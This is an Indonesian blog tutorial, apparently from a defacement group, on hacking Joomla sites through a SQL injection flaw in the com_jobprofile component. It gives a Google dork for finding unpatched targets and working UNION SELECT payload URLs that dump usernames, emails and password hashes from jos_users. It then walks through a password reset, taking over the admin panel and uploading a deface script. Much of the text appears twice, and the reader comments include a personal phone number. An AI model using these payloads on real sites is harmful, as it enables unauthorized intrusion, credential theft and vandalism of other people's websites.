Cara Deface Hacked
Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit +UNION
Malam sahabat ROG, masih ada suaranya-?
Hohoho…. Bercanda, sob..
Yesudah jangan lama-lama bercandanya. SERIUS niih…
hehehe…
Kali ini Rafi Orilya Groups akan berbagi tutorial Hack Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit.
Pertama-tama kami beri wawasan mengenai deface itu.
Deface adalah mengubah suatu tampilan, jadi Deface Web adalah mengubah tampilan web tersebut sesuai keinginan kita. Hehehe.. :D, mau diganti foto gue juga gapapa… wkakaka…
Yang penting happy…
Yang dibutuhkan adalah :
1. Dork-dork yang kreatif sesuai target
2. Kesabaran dalam mencari web target yang belum ter Patch
hanya itu yang kita butuhkan dalam mendeface suatu web.
Mungkin banyak sekali defacer-defacer Indonesia yang sudah akrab ditelinga kita, tapi bagaimana mereka melakukan itu-? (itulah yang kita pikirkan)
Baik… kami berbagi tutor bagaimana salah satu dari mereka melakukan Deface pada web dengan mencari celah pada web tersebut.
baik…. Ikuti langkah-langkah dibawah :
* Langkah pertama yang harus kita lakukan adalah mencari target.
Silahkan gunakan dork dibawah untuk mencari target :
Dork => inurl:"index.php?option=com_jobprofile”
Dork bisa kalian ganti sesuai kreatifitas sobat…
Dork digunakan dimesin pencari Goole (Google Serba Tahu)
Hohoho…. Bercanda, sob..
Yesudah jangan lama-lama bercandanya. SERIUS niih…
hehehe…
Kali ini Rafi Orilya Groups akan berbagi tutorial Hack Joomla SQL Injection Vulnerability dengan teknik gabungan Exploit.
Pertama-tama kami beri wawasan mengenai deface itu.
Deface adalah mengubah suatu tampilan, jadi Deface Web adalah mengubah tampilan web tersebut sesuai keinginan kita. Hehehe.. :D, mau diganti foto gue juga gapapa… wkakaka…
Yang penting happy…
Yang dibutuhkan adalah :
1. Dork-dork yang kreatif sesuai target
2. Kesabaran dalam mencari web target yang belum ter Patch
hanya itu yang kita butuhkan dalam mendeface suatu web.
Mungkin banyak sekali defacer-defacer Indonesia yang sudah akrab ditelinga kita, tapi bagaimana mereka melakukan itu-? (itulah yang kita pikirkan)
Baik… kami berbagi tutor bagaimana salah satu dari mereka melakukan Deface pada web dengan mencari celah pada web tersebut.
baik…. Ikuti langkah-langkah dibawah :
* Langkah pertama yang harus kita lakukan adalah mencari target.
Silahkan gunakan dork dibawah untuk mencari target :
Dork => inurl:"index.php?option=com_jobprofile”
Dork bisa kalian ganti sesuai kreatifitas sobat…
Dork digunakan dimesin pencari Goole (Google Serba Tahu)
* Selanjutnya kita cek web tersebut apakah bisa kita
lanjutkan ke tahap selanjutnya.
Silahkan tambahkan ( – ) sebelum nomor ID
Contoh :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1
Atau tambahkan tanda ( ‘ ) pada akhir Number ID
JIka muncul pesan “Eror” kita lanjutkan ke langkah selanjutnya
* Selanjutnya kita Exploitasi web tersebut dengan Exploit dibawah :
Silahkan gabungkan exploitnya :
+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–
Letakan diakhir URL tersebut sehingga akan menjadi :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Silahkan tambahkan ( – ) sebelum nomor ID
Contoh :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1
Atau tambahkan tanda ( ‘ ) pada akhir Number ID
JIka muncul pesan “Eror” kita lanjutkan ke langkah selanjutnya
* Selanjutnya kita Exploitasi web tersebut dengan Exploit dibawah :
Silahkan gabungkan exploitnya :
+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–
Letakan diakhir URL tersebut sehingga akan menjadi :
http://www.target.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
Nahh disitu akan keluar Email dan Tokennya silahkan copy dan
simpan baik-baik.
Jangan sampe diambil sama pacar.
WOOOWW.. :D
* Sekarang kita masuk ke halaman reset password :
kita tambahkan : /index.php?option=com_user&view=reset
Contoh : http://www.target.com/index.php?option=com_user&view=reset
Oke dah, masukin email dan passwordnya yang tadi.
Sekarang masuk ke control panel web tersebut.
Silahkan ubah html pada web tersebut.
Atau bisa juga sobat masukkan/ upload Script deface sobat.
Perhatian!!!
Kalau tokennya mengandung symbol $$$$ (Salt) maka token tidak akan bekerja.
Jadi cari target yang lain saja.
Saya bukan master Defacer jadi mohon maaf jika ada kesalahan atau salah kata dari saya, semoga postingan kali ini bermanfaat bagi sobat.
Baik pula jika memberikan komentar dibawah.
Artikel DIlindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)
Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
Jangan sampe diambil sama pacar.
WOOOWW.. :D
* Sekarang kita masuk ke halaman reset password :
kita tambahkan : /index.php?option=com_user&view=reset
Contoh : http://www.target.com/index.php?option=com_user&view=reset
Oke dah, masukin email dan passwordnya yang tadi.
Sekarang masuk ke control panel web tersebut.
Silahkan ubah html pada web tersebut.
Atau bisa juga sobat masukkan/ upload Script deface sobat.
Perhatian!!!
Kalau tokennya mengandung symbol $$$$ (Salt) maka token tidak akan bekerja.
Jadi cari target yang lain saja.
Saya bukan master Defacer jadi mohon maaf jika ada kesalahan atau salah kata dari saya, semoga postingan kali ini bermanfaat bagi sobat.
Baik pula jika memberikan komentar dibawah.
Artikel DIlindungi
Sertakan alamat blog ini jika mengcopy paste
(Hak Cipta Dilindungi)
Terima Kasih
Rafi Orilya Groups
by Rafi Aldiansyah Asikin
wew kk hekel y?ajarin dunk...oh ea k,low g salah stepnya ada yg ilang.tu brfungsi low celahnya pada union 2.yg q tanyain apa angka union yg keluar akan slalu angka 2?makasih sbelumnya mohon di bales ke msg fb https://www.facebook.com/beby.crew.style atau sms k 083606558216 mksh sblumbya
BalasHapussaya bukan hacker saya cuma mempelajari.. hal yang bermanfaat-
BalasHapusengga mas... kan sesuai cek union target web yg mas cari-union.nya
kaka ijin copas ditunggu kunbalnya salam persaudaraanya.
BalasHapusiyaah, silahkan... sumbernya yaah jangan lupa
HapusIni beda dengan yang sebelumnya ya mas?? wahh
BalasHapusBeda mas, silahkan dipelajari :)
HapusBanyak newbie hacker yang experiment hack web bangsanya sendiri, Mohon Jangan di salah gunakan ilmu hack, jangan sampe hack merugikan bangsa sendiri...
BalasHapusBetul sekali semoga bisa memberikan perlindungan lebih bagi web nasional :)
Hapusntap
BalasHapusSemoga bermanfaat ya gan :D
Hapuskunjungi balik gan votraxs.blogspot.co.id
BalasHapusSiap gan, segera saya mampir gan :)
Hapus